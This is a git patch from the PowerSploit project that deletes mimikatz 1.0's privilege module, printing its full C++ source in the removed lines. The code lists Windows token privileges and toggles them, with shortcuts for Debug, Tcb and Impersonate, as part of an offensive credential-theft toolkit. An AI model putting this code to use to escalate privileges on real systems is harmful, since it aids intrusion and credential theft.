From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 3 Feb 2014 17:13:35 -0500 Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit. --- .../mimikatz/modules/mod_mimikatz_privilege.cpp | 167 --------------------- 1 file changed, 167 deletions(-) delete mode 100644 Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp') diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp deleted file mode 100644 index 1b29486..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp +++ /dev/null @@ -1,167 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_privilege.h" -#include "..\global.h" - -vector mod_mimikatz_privilege::getMimiKatzCommands() -{ - vector monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les privilèges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(enable, L"enable", L"Active un ou plusieurs privilèges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(remove, L"remove", L"Retire un ou plusieurs privilèges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(disable, L"disable", L"Désactive un ou plusieurs privilèges")); - /* Raccourçis */ - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(debug, L"debug", L"Demande (ou désactive) le privilège Debug")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(security, L"security", L"Demande (ou désactive) le privilège Security")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(tcb, L"tcb", L"Demande (ou désactive) le privilège Tcb")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(impersonate, L"impersonate", L"Demande (ou désactive) le privilège Impersonate")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(assign, L"assign", L"Demande (ou désactive) le privilège AssignPrimaryToken")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(shutdown, L"shutdown", L"Demande (ou désactive) le privilège Shutdown")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(takeowner, L"takeowner", L"Demande (ou désactive) le privilège TakeOwnership")); - return monVector; -} - -bool mod_mimikatz_privilege::enable(vector * arguments) -{ - bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_ENABLED); - return true; -} - -bool mod_mimikatz_privilege::remove(vector * arguments) -{ - bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_REMOVED); - return true; -} - -bool mod_mimikatz_privilege::disable(vector * arguments) -{ - bool reussite = multiplePrivs(arguments, 0); - return true; -} - -bool mod_mimikatz_privilege::simplePriv(wstring priv, vector * arguments) -{ - bool ajout = arguments->empty(); - - (*outputStream) << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : "; - - vector> * mesPrivs = new vector>; - mesPrivs->push_back(make_pair(priv, ajout ? SE_PRIVILEGE_ENABLED : 0)); - - bool reussite = mod_privilege::set(mesPrivs);//, INVALID_HANDLE_VALUE); - delete mesPrivs; - - if(reussite) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return reussite; -} - -bool mod_mimikatz_privilege::multiplePrivs(vector * privs, DWORD type) -{ - bool reussite = false; - vector> * mesPrivs = new vector>; - for(vector::iterator monPrivilege = privs->begin(); monPrivilege != privs->end() ; monPrivilege++) - { - mesPrivs->push_back(make_pair(*monPrivilege, type)); - } - reussite = mod_privilege::set(mesPrivs); - delete mesPrivs; - - if(reussite) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return reussite; -} - - -bool mod_mimikatz_privilege::list(vector * arguments) -{ - vector> * mesPrivs = new vector>; - - if(mod_privilege::get(mesPrivs))//, INVALID_HANDLE_VALUE)) - { - for(vector>::iterator monPrivilege = mesPrivs->begin(); (monPrivilege != mesPrivs->end()) ; monPrivilege++) - { - (*outputStream) << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t'; - - if(monPrivilege->second & SE_PRIVILEGE_VALID_ATTRIBUTES) - { - if(monPrivilege->second & SE_PRIVILEGE_ENABLED_BY_DEFAULT) - { - (*outputStream) << L"ENABLED_BY_DEFAULT "; - } - - if(monPrivilege->second & SE_PRIVILEGE_ENABLED) - { - (*outputStream) << L"ENABLED "; - } - - if(monPrivilege->second & SE_PRIVILEGE_REMOVED) - { - (*outputStream) << L"REMOVED "; - } - - if(monPrivilege->second & SE_PRIVILEGE_USED_FOR_ACCESS) - { - (*outputStream) << L"USED_FOR_ACCESS "; - } - - if(monPrivilege->second & SE_PRIVILEGE_REMOVED) - { - (*outputStream) << L"REMOVED"; - } - } - - (*outputStream) << endl; - } - } - else (*outputStream) << mod_system::getWinError() << endl; - - return true; -} - - -bool mod_mimikatz_privilege::debug(vector * arguments) -{ - simplePriv(SE_DEBUG_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::security(vector * arguments) -{ - simplePriv(SE_SECURITY_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::tcb(vector * arguments) -{ - simplePriv(SE_TCB_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::impersonate(vector * arguments) -{ - simplePriv(SE_IMPERSONATE_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::assign(vector * arguments) -{ - simplePriv(SE_ASSIGNPRIMARYTOKEN_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::shutdown(vector * arguments) -{ - simplePriv(SE_SHUTDOWN_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::takeowner(vector * arguments) -{ - simplePriv(SE_TAKE_OWNERSHIP_NAME, arguments); return true; -} \ No newline at end of file -- cgit v1.2.3